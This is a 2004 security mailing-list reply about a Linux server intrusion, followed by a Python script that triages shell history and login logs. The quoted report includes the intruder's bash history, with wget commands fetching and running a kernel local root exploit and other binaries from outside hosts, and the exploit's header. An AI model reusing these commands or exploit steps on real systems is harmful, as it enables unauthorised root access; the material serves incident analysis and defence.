Re: Visited by a cracker

From: Manuel Arostegui Ramirez (manuel_at_todo-linux.com)
Date: 07/12/04

    To: "Per Christian B. Viken" <perchr@angryadmin.net>, <focus-linux@securityfocus.com>
    Date: Mon, 12 Jul 2004 14:58:04 +0200
    
    

    On Sunday 11 July 2004 16:45, Per Christian B. Viken wrote:
    > Hello
    >
    > I've had a rather disturbing evening.
    > A friend of mine runs a small server for himself and some friends. It's
    > running slackware 10.
    > When I logged in, I noticed that the load was way over what's normal
    > (around 1.36 now, usually it's under 0.10), so I run 'top'. I see a program
    > called 'strace' running, hogging all the cpu power.
    >
    > So I get curious. I chdir to the user's home, and look around. It's empty.
    > But, the 'smart' little cracker has forgotten about .bash_history, so here
    > I can see everything that he has been doing.
    > Apparently, he has downloaded and setup an eggdrop, removed it again, and
    > then downloaded a psybnc, which he also removed shortly. Then things get
    > interesting.
    >
    > <SNIP>
    > wget http://personal.telefonica.terra.es/web/alexb/e/ptrace-kmod.c
    > gcc ptrace-kmod.c -o ptrace
    > ./ptrace
    > chmod +x ptrace
    > ./ptrace
    > rm -rf ptrace
    > ls
    > rm -rf ptrace-kmod.c
    > wget www.drac.as.ro/egx
    > chmod +x egx
    > ./egx
    > who
    > passwd
    > Uptime
    > <SNIP>
    > ./egx
    > rm -rf egx
    > wget 220.88.27.11/usage/apache.tar.gz
    > </SNIP>
    >
    > The ptrace-kmod.c has this for a header:
    > /*
    > * Linux kernel ptrace/kmod local root exploit
    > *
    > * This code exploits a race condition in kernel/kmod.c, which creates
    > * kernel thread in insecure manner. This bug allows to ptrace cloned
    > * process, allowing to take control over privileged modprobe binary.
    > *
    > * Should work under all current 2.2.x and 2.4.x kernels.
    >
    > Luckily, the server runs 2.6.6, so this wasn't any threat.
    > The 'egx' executable seems to be somewhat like the other, cause when I run
    > it, it outputs '[-] Unable to determine kernel address: Operation not
    > supported' and dies.
    >
    > My guesses are that the apache.tar.gz-file is also some kind of exploit,
    > but I couldn't get it, so I didn't get a chance to see.
    >
    > Seeing that he didn't know how to properly hide his tracks, I hoped he
    > might be stupid enough to use his own IP to log in from as well, so I run
    > 'cat /var/log/messages | grep <username>'.
    > But, he has logged in and out using 7 different IPs. 5 belonging to
    > Pakistan, and the other two to Lebanon.
    >
    > I've been suspicious of this user since my friend added him a few days ago.
    > He actually got a domain, prepaid for three years for an account, so I did
    > have some concerns about this.
    > Now, after discovering this, I've talked with my friend, and the credit
    > card used to pay for the domain belongs to a woman in the UK. Probably
    > stolen or something.
    >
    > I've run chkrootkit 0.43 and Rootkit Hunter 1.1.1 and they didn't find
    > anything.
    > So, my real question is:
    >
    > Is there anything else I should check out? Anywhere else some nasty
    > exploits or trojans might be hiding? And should I try to find this guy? Or
    > is it probably hopeless?
    >
    > Best Regards,
    > Per Christian B. Viken

    Have you patched the local bug which can crash your machine, where the only
    solution is to reboot it?
    This could be scary serious if you're running some kind of server on that
    machine and its kernel is not patched.
    Here is some information and patches:
    http://linuxreviews.org/news/2004/06/11_kernel_crash/
    http://marc.theaimsgroup.com/?l=linux-kernel&m=108704334308688&w=2

    Best regards
    Manuel
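
Per's question about what else to check, together with the shell history he quotes, suggests two cheap triage checks. The following is an added example, not code from either poster: it flags files that were downloaded (or compiled from a download), executed and then deleted within one shell history, and counts distinct login source addresses per user from sshd-style "Accepted" log lines. The history lines are taken from the post; the log lines, user names and 192.0.2.x/198.51.100.x addresses are constructed placeholders.

```python
import re
from collections import defaultdict

# Shell history reconstructed from the post (download hosts kept as they appear there).
HISTORY = """wget http://personal.telefonica.terra.es/web/alexb/e/ptrace-kmod.c
gcc ptrace-kmod.c -o ptrace
chmod +x ptrace
./ptrace
rm -rf ptrace
rm -rf ptrace-kmod.c
wget www.drac.as.ro/egx
chmod +x egx
./egx
rm -rf egx
wget 220.88.27.11/usage/apache.tar.gz""".splitlines()

# Constructed sshd-style log lines; users and addresses are placeholders, not from the post.
MESSAGES = """Jul 10 02:11:03 box sshd[811]: Accepted password for bob from 192.0.2.10 port 4021 ssh2
Jul 10 03:40:19 box sshd[902]: Accepted password for bob from 192.0.2.77 port 1180 ssh2
Jul 11 01:05:44 box sshd[977]: Accepted password for bob from 198.51.100.5 port 3301 ssh2
Jul 11 09:12:00 box sshd[990]: Accepted publickey for alice from 192.0.2.10 port 5002 ssh2""".splitlines()

FETCH = re.compile(r'^(?:wget|curl)\s+(\S+)')
BUILD = re.compile(r'^gcc\s+(\S+)\s+-o\s+(\S+)')
EXEC = re.compile(r'^\./(\S+)')
LOGIN = re.compile(r'Accepted \w+ for (\S+) from (\d+(?:\.\d+){3})')

def fetch_run_wipe(history):
    """Names that were downloaded (or compiled from a download), executed, then deleted."""
    fetched, executed, removed = set(), set(), set()
    for line in (l.strip() for l in history):
        if m := FETCH.match(line):
            fetched.add(m.group(1).rsplit('/', 1)[-1])   # basename of the URL
        elif (m := BUILD.match(line)) and m.group(1) in fetched:
            fetched.add(m.group(2))                      # binary inherits its source's origin
        elif m := EXEC.match(line):
            executed.add(m.group(1))
        elif line.startswith('rm '):
            removed.update(t for t in line.split()[1:] if not t.startswith('-'))
    return sorted(fetched & executed & removed)

def login_sources(log_lines):
    """Distinct source addresses per user from sshd 'Accepted' lines."""
    sources = defaultdict(set)
    for line in log_lines:
        if m := LOGIN.search(line):
            sources[m.group(1)].add(m.group(2))
    return {user: sorted(ips) for user, ips in sources.items()}
```

Calling `fetch_run_wipe(HISTORY)` yields the two binaries the post describes being run and removed, while `apache.tar.gz` (fetched but never executed) is not flagged; `login_sources(MESSAGES)` gives the per-user address list the poster assembled by hand with grep.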

